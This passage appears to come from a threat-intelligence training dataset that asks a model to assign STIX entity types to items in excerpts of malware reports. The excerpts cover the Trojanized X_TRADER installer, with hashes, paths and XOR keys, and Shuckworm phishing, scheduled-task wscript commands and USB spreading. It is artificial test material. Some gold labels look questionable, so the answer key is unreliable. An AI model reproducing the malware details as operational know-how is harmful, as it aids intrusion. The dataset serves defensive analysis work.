\"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nTpmVscMgrSvr.exe\n\n---\n\n### Text Passage:\nMalicious Installer\nThe infection chain starts with the Trojanized installer named X_TRADER_r7.17.90p608.exe (SHA256: 900b63ff9b06e0890bf642bdfcbfcc6ab7887c7a3c057c8e3fd6fba5ffc8e5d6), which is digitally signed by \"Trading Technologies International, Inc.\" and contains a malicious executable named Setup.exe. Our analysis of one version of this executable (SHA256: aa318070ad1bf90ed459ac34dc5254acc178baff3202d2ea7f49aaf5a055dd43) found that when executed, it examined the file named X_TRADER-ja.mst (also contained in the installer) for the following marker bytes at hardcoded offset 0x167000:\n* 5E DA F3 76\nIf the marker bytes are present, it creates a folder named:\n* C:\\Programdata\\TPM\nIt then copies the file C:\\Windows\\Sysnative\\immersivetpmvscmgrsvr.exe as C:\\Programdata\\TPM\\TpmVscMgrSvr.exe to the new folder.\nNext, it will drop two malicious DLLs:\n* C:\\Programdata\\TPM\\winscard.dll (SHA256: cc4eedb7b1f77f02b962f4b05278fa7f8082708b5a12cacf928118520762b5e2)\n* C:\\Programdata\\TPM\\msvcr100.dll (SHA256: d937e19ccb3fd1dddeea3eaaf72645e8cd64083228a0df69c60820289b1aa3c0)\nThe content of the dropped files is generated by decrypting chunks of the file X_TRADER-ja.mst mentioned earlier using the XOR algorithm with the following key:\n* 74 F2 39 DA E5 CF\nTo achieve persistence on the victim\u2019s system, the malware invokes a CLSID_TaskScheduler COM object, possibly to create a scheduled task to run periodically the following file:\n* C:\\Programdata\\TPM\\TpmVscMgrSvr.exe\nSetup.exe then drops a file named X_TRADER.exe, also contained within the installer. The content of the dropped file is generated by decrypting chunks from one of its own portable executable resources starting at hardcoded offset 0x1CB40 using the XOR algorithm with the following key:\n* 74 F2 39 DA E5 CF\nSetup will then execute X_Trader.exe before deleting itself.\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nSetup.exe\n\n---\n\n### Text Passage:\nMalicious Installer\nThe infection chain starts with the Trojanized installer named X_TRADER_r7.17.90p608.exe (SHA256: 900b63ff9b06e0890bf642bdfcbfcc6ab7887c7a3c057c8e3fd6fba5ffc8e5d6), which is digitally signed by \"Trading Technologies International, Inc.\" and contains a malicious executable named Setup.exe. Our analysis of one version of this executable (SHA256: aa318070ad1bf90ed459ac34dc5254acc178baff3202d2ea7f49aaf5a055dd43) found that when executed, it examined the file named X_TRADER-ja.mst (also contained in the installer) for the following marker bytes at hardcoded offset 0x167000:\n* 5E DA F3 76\nIf the marker bytes are present, it creates a folder named:\n* C:\\Programdata\\TPM\nIt then copies the file C:\\Windows\\Sysnative\\immersivetpmvscmgrsvr.exe as C:\\Programdata\\TPM\\TpmVscMgrSvr.exe to the new folder.\nNext, it will drop two malicious DLLs:\n* C:\\Programdata\\TPM\\winscard.dll (SHA256: cc4eedb7b1f77f02b962f4b05278fa7f8082708b5a12cacf928118520762b5e2)\n* C:\\Programdata\\TPM\\msvcr100.dll (SHA256: d937e19ccb3fd1dddeea3eaaf72645e8cd64083228a0df69c60820289b1aa3c0)\nThe content of the dropped files is generated by decrypting chunks of the file X_TRADER-ja.mst mentioned earlier using the XOR algorithm with the following key:\n* 74 F2 39 DA E5 CF\nTo achieve persistence on the victim\u2019s system, the malware invokes a CLSID_TaskScheduler COM object, possibly to create a scheduled task to run periodically the following file:\n* C:\\Programdata\\TPM\\TpmVscMgrSvr.exe\nSetup.exe then drops a file named X_TRADER.exe, also contained within the installer. The content of the dropped file is generated by decrypting chunks from one of its own portable executable resources starting at hardcoded offset 0x1CB40 using the XOR algorithm with the following key:\n* 74 F2 39 DA E5 CF\nSetup will then execute X_Trader.exe before deleting itself.\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nd937e19ccb3fd1dddeea3eaaf72645e8cd64083228a0df69c60820289b1aa3c0\n\n---\n\n### Text Passage:\nMalicious Installer\nThe infection chain starts with the Trojanized installer named X_TRADER_r7.17.90p608.exe (SHA256: 900b63ff9b06e0890bf642bdfcbfcc6ab7887c7a3c057c8e3fd6fba5ffc8e5d6), which is digitally signed by \"Trading Technologies International, Inc.\" and contains a malicious executable named Setup.exe. Our analysis of one version of this executable (SHA256: aa318070ad1bf90ed459ac34dc5254acc178baff3202d2ea7f49aaf5a055dd43) found that when executed, it examined the file named X_TRADER-ja.mst (also contained in the installer) for the following marker bytes at hardcoded offset 0x167000:\n* 5E DA F3 76\nIf the marker bytes are present, it creates a folder named:\n* C:\\Programdata\\TPM\nIt then copies the file C:\\Windows\\Sysnative\\immersivetpmvscmgrsvr.exe as C:\\Programdata\\TPM\\TpmVscMgrSvr.exe to the new folder.\nNext, it will drop two malicious DLLs:\n* C:\\Programdata\\TPM\\winscard.dll (SHA256: cc4eedb7b1f77f02b962f4b05278fa7f8082708b5a12cacf928118520762b5e2)\n* C:\\Programdata\\TPM\\msvcr100.dll (SHA256: d937e19ccb3fd1dddeea3eaaf72645e8cd64083228a0df69c60820289b1aa3c0)\nThe content of the dropped files is generated by decrypting chunks of the file X_TRADER-ja.mst mentioned earlier using the XOR algorithm with the following key:\n* 74 F2 39 DA E5 CF\nTo achieve persistence on the victim\u2019s system, the malware invokes a CLSID_TaskScheduler COM object, possibly to create a scheduled task to run periodically the following file:\n* C:\\Programdata\\TPM\\TpmVscMgrSvr.exe\nSetup.exe then drops a file named X_TRADER.exe, also contained within the installer. The content of the dropped file is generated by decrypting chunks from one of its own portable executable resources starting at hardcoded offset 0x1CB40 using the XOR algorithm with the following key:\n* 74 F2 39 DA E5 CF\nSetup will then execute X_Trader.exe before deleting itself.\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nwinscard.dll\n\n---\n\n### Text Passage:\nMalicious Installer\nThe infection chain starts with the Trojanized installer named X_TRADER_r7.17.90p608.exe (SHA256: 900b63ff9b06e0890bf642bdfcbfcc6ab7887c7a3c057c8e3fd6fba5ffc8e5d6), which is digitally signed by \"Trading Technologies International, Inc.\" and contains a malicious executable named Setup.exe. Our analysis of one version of this executable (SHA256: aa318070ad1bf90ed459ac34dc5254acc178baff3202d2ea7f49aaf5a055dd43) found that when executed, it examined the file named X_TRADER-ja.mst (also contained in the installer) for the following marker bytes at hardcoded offset 0x167000:\n* 5E DA F3 76\nIf the marker bytes are present, it creates a folder named:\n* C:\\Programdata\\TPM\nIt then copies the file C:\\Windows\\Sysnative\\immersivetpmvscmgrsvr.exe as C:\\Programdata\\TPM\\TpmVscMgrSvr.exe to the new folder.\nNext, it will drop two malicious DLLs:\n* C:\\Programdata\\TPM\\winscard.dll (SHA256: cc4eedb7b1f77f02b962f4b05278fa7f8082708b5a12cacf928118520762b5e2)\n* C:\\Programdata\\TPM\\msvcr100.dll (SHA256: d937e19ccb3fd1dddeea3eaaf72645e8cd64083228a0df69c60820289b1aa3c0)\nThe content of the dropped files is generated by decrypting chunks of the file X_TRADER-ja.mst mentioned earlier using the XOR algorithm with the following key:\n* 74 F2 39 DA E5 CF\nTo achieve persistence on the victim\u2019s system, the malware invokes a CLSID_TaskScheduler COM object, possibly to create a scheduled task to run periodically the following file:\n* C:\\Programdata\\TPM\\TpmVscMgrSvr.exe\nSetup.exe then drops a file named X_TRADER.exe, also contained within the installer. The content of the dropped file is generated by decrypting chunks from one of its own portable executable resources starting at hardcoded offset 0x1CB40 using the XOR algorithm with the following key:\n* 74 F2 39 DA E5 CF\nSetup will then execute X_Trader.exe before deleting itself.\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n900b63ff9b06e0890bf642bdfcbfcc6ab7887c7a3c057c8e3fd6fba5ffc8e5d6\n\n---\n\n### Text Passage:\nMalicious Installer\nThe infection chain starts with the Trojanized installer named X_TRADER_r7.17.90p608.exe (SHA256: 900b63ff9b06e0890bf642bdfcbfcc6ab7887c7a3c057c8e3fd6fba5ffc8e5d6), which is digitally signed by \"Trading Technologies International, Inc.\" and contains a malicious executable named Setup.exe. Our analysis of one version of this executable (SHA256: aa318070ad1bf90ed459ac34dc5254acc178baff3202d2ea7f49aaf5a055dd43) found that when executed, it examined the file named X_TRADER-ja.mst (also contained in the installer) for the following marker bytes at hardcoded offset 0x167000:\n* 5E DA F3 76\nIf the marker bytes are present, it creates a folder named:\n* C:\\Programdata\\TPM\nIt then copies the file C:\\Windows\\Sysnative\\immersivetpmvscmgrsvr.exe as C:\\Programdata\\TPM\\TpmVscMgrSvr.exe to the new folder.\nNext, it will drop two malicious DLLs:\n* C:\\Programdata\\TPM\\winscard.dll (SHA256: cc4eedb7b1f77f02b962f4b05278fa7f8082708b5a12cacf928118520762b5e2)\n* C:\\Programdata\\TPM\\msvcr100.dll (SHA256: d937e19ccb3fd1dddeea3eaaf72645e8cd64083228a0df69c60820289b1aa3c0)\nThe content of the dropped files is generated by decrypting chunks of the file X_TRADER-ja.mst mentioned earlier using the XOR algorithm with the following key:\n* 74 F2 39 DA E5 CF\nTo achieve persistence on the victim\u2019s system, the malware invokes a CLSID_TaskScheduler COM object, possibly to create a scheduled task to run periodically the following file:\n* C:\\Programdata\\TPM\\TpmVscMgrSvr.exe\nSetup.exe then drops a file named X_TRADER.exe, also contained within the installer. The content of the dropped file is generated by decrypting chunks from one of its own portable executable resources starting at hardcoded offset 0x1CB40 using the XOR algorithm with the following key:\n* 74 F2 39 DA E5 CF\nSetup will then execute X_Trader.exe before deleting itself.\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nimmersivetpmvscmgrsvr.exe\n\n---\n\n### Text Passage:\nMalicious Installer\nThe infection chain starts with the Trojanized installer named X_TRADER_r7.17.90p608.exe (SHA256: 900b63ff9b06e0890bf642bdfcbfcc6ab7887c7a3c057c8e3fd6fba5ffc8e5d6), which is digitally signed by \"Trading Technologies International, Inc.\" and contains a malicious executable named Setup.exe. Our analysis of one version of this executable (SHA256: aa318070ad1bf90ed459ac34dc5254acc178baff3202d2ea7f49aaf5a055dd43) found that when executed, it examined the file named X_TRADER-ja.mst (also contained in the installer) for the following marker bytes at hardcoded offset 0x167000:\n* 5E DA F3 76\nIf the marker bytes are present, it creates a folder named:\n* C:\\Programdata\\TPM\nIt then copies the file C:\\Windows\\Sysnative\\immersivetpmvscmgrsvr.exe as C:\\Programdata\\TPM\\TpmVscMgrSvr.exe to the new folder.\nNext, it will drop two malicious DLLs:\n* C:\\Programdata\\TPM\\winscard.dll (SHA256: cc4eedb7b1f77f02b962f4b05278fa7f8082708b5a12cacf928118520762b5e2)\n* C:\\Programdata\\TPM\\msvcr100.dll (SHA256: d937e19ccb3fd1dddeea3eaaf72645e8cd64083228a0df69c60820289b1aa3c0)\nThe content of the dropped files is generated by decrypting chunks of the file X_TRADER-ja.mst mentioned earlier using the XOR algorithm with the following key:\n* 74 F2 39 DA E5 CF\nTo achieve persistence on the victim\u2019s system, the malware invokes a CLSID_TaskScheduler COM object, possibly to create a scheduled task to run periodically the following file:\n* C:\\Programdata\\TPM\\TpmVscMgrSvr.exe\nSetup.exe then drops a file named X_TRADER.exe, also contained within the installer. The content of the dropped file is generated by decrypting chunks from one of its own portable executable resources starting at hardcoded offset 0x1CB40 using the XOR algorithm with the following key:\n* 74 F2 39 DA E5 CF\nSetup will then execute X_Trader.exe before deleting itself.\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nSymantec\n\n---\n\n### Text Passage:\nShuckworm tactics, techniques, and procedures\nShuckworm is known to use phishing emails as an initial infection vector, in order to gain access to victim machines and distribute malware. The attackers send emails with malicious attachments to Ukrainian victims, with the attachments of various file types, such as:\n* .docx\n* .rar (RAR archive files)\n* .sfx (self-extracting archives)\n* .lnk\n* .hta (HTML smuggling files)\nThe victim lures we observed related to armed conflicts, criminal proceedings, combating crime, and protection of children, among others.\nOnce victims were infected, the attackers then proceed to download additional backdoors and tools onto targeted machines.\nShuckworm has also been observed using a new PowerShell script in order to spread its custom backdoor malware, Pterodo, via USB. Researchers from Symantec, part of Broadcom, blogged about Backdoor.Pterodo in April 2022, documenting how we had found four variants of the backdoor with similar functionality. The variants are Visual Basic Script (VBS) droppers that will drop a VBScript file, use Scheduled Tasks (shtasks.exe) to maintain persistence, and download additional code from a command-and-control (C&C) server.\nExamples of recent scheduled tasks include execution of the following command lines:\n* CSIDL_SYSTEM\\wscript.exe \"CSIDL_PROFILE\\appdata\\local\\temp\\desert\" //e:vbscript //b /dmc /j2k /spl /nff\n* CSIDL_SYSTEM\\wscript.exe \"CSIDL_PROFILE\\favorites\\jumper.asf\" //e:vbscript //b /asf /mdf /nab /apk\n* wscript.exe \"C:\\Users\\\\[REDACTED]\\Contacts\\delightful.abk\" //e:vbscript //b /cfg /mdm /cfm /mp4\nThe new PowerShell script is used to first copy itself onto the infected machine and create a shortcut file using an _rtk.lnk_ extension. The script uses file names such as \u201cporn_video.rtf.lnk\u201d, \u201cdo_not_delete.rtf.lnk\u201d\u201d and \u201cevidence.rtf.lnk\u201d in an attempt to entice individuals to open the files. These file names are generally in Ukrainian, but some are also in English.\nNext, the script enumerates all drives, copying itself to any available removable disks \u2013 USB drives. These USB drives are likely used by the attackers for lateral movement across victim networks and may be used to help the attackers reach air-gapped machines within targeted organizations.\nIn this recent activity, we also observed the group leveraging legitimate services to act as C&C servers, including using the Telegram messaging service for its C&C infrastructure. More recently, they have also used Telegram\u2019s micro-blogging platform, called Telegraph, to store C&C addresses.\nFigure 1. Threat actors use Telegraph to store C&C addresses\nShuckworm tends to only use its C&C infrastructure for short periods of time, limiting the usefulness of its C&Cs when it comes to finding more activity or linking activity together. However, the group does use SSL certificates that have some commonalities that may be leveraged for tracking purposes. We believe the group is likely leveraging pre-configured images for use in its C&C deployment. These data points can help researchers to identify additional C&C infrastructure and Shuckworm activity.\nSymantec also saw what was likely Giddome, an infostealer tool that is a known Shuckworm backdoor, deployed onto victim networks to steal and exfiltrate data of interest.\n",
"output": "IDENTITY"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nC&C\n\n---\n\n### Text Passage:\nShuckworm tactics, techniques, and procedures\nShuckworm is known to use phishing emails as an initial infection vector, in order to gain access to victim machines and distribute malware. The attackers send emails with malicious attachments to Ukrainian victims, with the attachments of various file types, such as:\n* .docx\n* .rar (RAR archive files)\n* .sfx (self-extracting archives)\n* .lnk\n* .hta (HTML smuggling files)\nThe victim lures we observed related to armed conflicts, criminal proceedings, combating crime, and protection of children, among others.\nOnce victims were infected, the attackers then proceed to download additional backdoors and tools onto targeted machines.\nShuckworm has also been observed using a new PowerShell script in order to spread its custom backdoor malware, Pterodo, via USB. Researchers from Symantec, part of Broadcom, blogged about Backdoor.Pterodo in April 2022, documenting how we had found four variants of the backdoor with similar functionality. The variants are Visual Basic Script (VBS) droppers that will drop a VBScript file, use Scheduled Tasks (shtasks.exe) to maintain persistence, and download additional code from a command-and-control (C&C) server.\nExamples of recent scheduled tasks include execution of the following command lines:\n* CSIDL_SYSTEM\\wscript.exe \"CSIDL_PROFILE\\appdata\\local\\temp\\desert\" //e:vbscript //b /dmc /j2k /spl /nff\n* CSIDL_SYSTEM\\wscript.exe \"CSIDL_PROFILE\\favorites\\jumper.asf\" //e:vbscript //b /asf /mdf /nab /apk\n* wscript.exe \"C:\\Users\\\\[REDACTED]\\Contacts\\delightful.abk\" //e:vbscript //b /cfg /mdm /cfm /mp4\nThe new PowerShell script is used to first copy itself onto the infected machine and create a shortcut file using an _rtk.lnk_ extension. The script uses file names such as \u201cporn_video.rtf.lnk\u201d, \u201cdo_not_delete.rtf.lnk\u201d\u201d and \u201cevidence.rtf.lnk\u201d in an attempt to entice individuals to open the files. These file names are generally in Ukrainian, but some are also in English.\nNext, the script enumerates all drives, copying itself to any available removable disks \u2013 USB drives. These USB drives are likely used by the attackers for lateral movement across victim networks and may be used to help the attackers reach air-gapped machines within targeted organizations.\nIn this recent activity, we also observed the group leveraging legitimate services to act as C&C servers, including using the Telegram messaging service for its C&C infrastructure. More recently, they have also used Telegram\u2019s micro-blogging platform, called Telegraph, to store C&C addresses.\nFigure 1. Threat actors use Telegraph to store C&C addresses\nShuckworm tends to only use its C&C infrastructure for short periods of time, limiting the usefulness of its C&Cs when it comes to finding more activity or linking activity together. However, the group does use SSL certificates that have some commonalities that may be leveraged for tracking purposes. We believe the group is likely leveraging pre-configured images for use in its C&C deployment. These data points can help researchers to identify additional C&C infrastructure and Shuckworm activity.\nSymantec also saw what was likely Giddome, an infostealer tool that is a known Shuckworm backdoor, deployed onto victim networks to steal and exfiltrate data of interest.\n",
"output": "INFRASTRUCTURE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake 